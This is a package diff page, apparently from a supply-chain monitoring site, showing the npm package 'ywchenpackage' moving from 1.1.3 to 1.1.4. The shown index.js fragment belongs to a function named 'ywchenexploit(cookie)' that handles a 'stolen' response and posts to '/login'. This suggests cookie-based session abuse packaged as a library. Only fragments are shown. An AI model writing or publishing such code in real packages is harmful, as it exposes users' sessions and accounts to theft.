RubyGems
npm
Organizations
Log in
Sign up
npm
ywchenpackage
Versions diffs
1.1.3 → 1.1.4
ywchenpackage 1.1.3 → 1.1.4
Sign up to get
free
protection for your applications and to get access to all the features.
Files changed (2)
hide
show
package/index.js
+1
-2
package/package.json
+1
-1
package/index.js
CHANGED
Viewed
@@ -8,8 +8,7 @@ function ywchenexploit(cookie) {
8
8
}
9
9
).then(
10
10
(response) => {
11
-
let stolen = response
[0]
;
12
-
stolen.author = "aaaa";
11
+
let stolen = response;
13
12
fetch(
14
13
"/login",
15
14
{
package/package.json
CHANGED
Viewed
@@ -1,6 +1,6 @@
1
1
{
2
2
"name": "ywchenpackage",
3
-
"version": "1.1.
3
",
3
+
"version": "1.1.
4
",
4
4
"description": "",
5
5
"main": "index.js",
6
6
"scripts": {